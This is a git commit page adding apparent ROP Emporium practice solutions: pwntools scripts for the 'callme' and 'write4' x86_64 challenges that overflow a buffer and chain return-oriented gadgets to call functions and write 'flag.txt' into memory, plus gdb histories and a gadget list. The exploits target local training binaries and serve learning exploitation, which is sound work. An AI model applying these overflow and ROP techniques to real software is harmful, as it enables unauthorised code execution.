summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
committerBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
commit3f0a1e64c7e7b410ad5f4e2024cd692536389449 (patch)
tree6474bed612527dd0ca7bc9d2f7096769fd212d14
parent2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (diff)
new file: x86_64/write4/exploit.py
new file: x86_64/write4/useful_gadgets
-rw-r--r--x86_64/callme/.gdb_history12
-rwxr-xr-xx86_64/callme/exploit2.py55
-rw-r--r--x86_64/write4/.exploit.py.swpbin0 -> 12288 bytes
-rw-r--r--x86_64/write4/.gdb_history197
-rw-r--r--x86_64/write4/.useful_gadgets.swpbin0 -> 12288 bytes
-rwxr-xr-xx86_64/write4/exploit.py19
-rw-r--r--x86_64/write4/stest2
-rw-r--r--x86_64/write4/useful_gadgets19
8 files changed, 304 insertions, 0 deletions
diff --git a/x86_64/callme/.gdb_history b/x86_64/callme/.gdb_history
new file mode 100644
index 0000000..451f131
--- /dev/null
+++ b/x86_64/callme/.gdb_history
@@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
diff --git a/x86_64/callme/exploit2.py b/x86_64/callme/exploit2.py
new file mode 100755
index 0000000..b6d228f
--- /dev/null
+++ b/x86_64/callme/exploit2.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+# pop rdi
+# pop rsi
+# pop rdx
+# ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
diff --git a/x86_64/write4/.exploit.py.swp b/x86_64/write4/.exploit.py.swp
new file mode 100644
index 0000000..5602feb
--- /dev/null
+++ b/x86_64/write4/.exploit.py.swp
Binary files differ
diff --git a/x86_64/write4/.gdb_history b/x86_64/write4/.gdb_history
new file mode 100644
index 0000000..75b327b
--- /dev/null
+++ b/x86_64/write4/.gdb_history
@@ -0,0 +1,197 @@
+run < stest
+exit
+quit
+break pwnme
+run
+context
+nexti
+quit
+exit
+quit
+quit
+continue
+nexti
+break pwnme+133
+break *pwnme+133
+nexti
+nexti
+nexti
+exit
+quit
+quit
+continue
+quit
+continue
+q
+continue
+quit
+continue
+context
+nexti
+quit
+q
+nexti
+continue
+nexti
+nexti
+stepi
+info reg
+context
+stepi
+exit
+quit
+quit
+exit
+quit
+quit
+exit
+quit
+quit
+quit
+continue
+info reg
+q
+continue
+context
+stepi
+stepi
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+quit
+continue
+context
+stepi
+return
+stepi
+ret
+return
+continue
+quit
+continue
+break print_file
+continue
+break print_file
+continue
+stepi
+nexti
+info reg
+context
+print errno
+stepi
+nexti
+continue
+q
+continue
+context
+stepi
+info reg
+context
+nexti
+info reg
+q
+continue
+context
+q
+continue
+context
+continue
+stepi
+return
+context
+nexti
+stepi
+continue
+q
+continue
+quit
+continue
+continue
+nexti
+quit
+quit
+continue
+context
+stepi
+info reg
+context
+q
+continue
+continue
+q
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+info reg r14
+stepi
+info reg r14
+stepi
+info reg r15
+stepi
+quit
+cotinue
+continue
+context
+continue
+continue
+q
+run
+continue
+context
+continue
+continue
+q
+continue
+nexti
+stepi
+info reg r14
+info reg r15
+x/x $r14
+stepi
+x/x $r14
+stepi
+x/x $r14
+stepi
+quit
+continue
+stepi
+return
+nexti
+stepi
+quit
+continue
+nexti
+nexti
+stepi
+continue
+quit
+stepi
+continue
+stepi
+nexti
+print .init_array
+x 0x0000000000600df0 + 0x00000df0
+x/s 0x0000000000600df0 + 0x00000df0
+quit
+continue
+stepi
+info reg
+q
+continue
+stepi
+stepi
+stepi
+stepi
+quit
diff --git a/x86_64/write4/.useful_gadgets.swp b/x86_64/write4/.useful_gadgets.swp
new file mode 100644
index 0000000..f89dc3e
--- /dev/null
+++ b/x86_64/write4/.useful_gadgets.swp
Binary files differ
diff --git a/x86_64/write4/exploit.py b/x86_64/write4/exploit.py
new file mode 100755
index 0000000..f8b294e
--- /dev/null
+++ b/x86_64/write4/exploit.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./write4')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += p64(0x0000000000400690) # pop r14, pop r15, ret
+payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
+payload += b"flag.txt" # our string (duh)
+payload += p64(0x0000000000400628) # mov qword ptr [r14], r15 ; ret
+payload += p64(0x0000000000400693) # pop rdi; ret
+payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
+payload += p64(0x0000000000400510) # print_file@plt
+payload += b"\n"
+prog.sendline(payload)
+print(str(prog.recv(), 'UTF-8'))
+prog.close()
diff --git a/x86_64/write4/stest b/x86_64/write4/stest
new file mode 100644
index 0000000..1b35584
--- /dev/null
+++ b/x86_64/write4/stest
@@ -0,0 +1,2 @@
+
+  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcd \ No newline at end of file
diff --git a/x86_64/write4/useful_gadgets b/x86_64/write4/useful_gadgets
new file mode 100644
index 0000000..09c0849
--- /dev/null
+++ b/x86_64/write4/useful_gadgets
@@ -0,0 +1,19 @@
+0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
+
+0x0000000000400690 : pop r14 ; pop r15 ; ret
+0x0000000000400628 : mov qword ptr [r14], r15 ; ret
+
+0x000000000040069) : pop rdi; ret
+
+
+
+
+
+0x0000000000400510 : print_file@plt
+0x0000000000600df0 : addr of init array
+
+we should write to .init_array .fini_array
+
+
+
+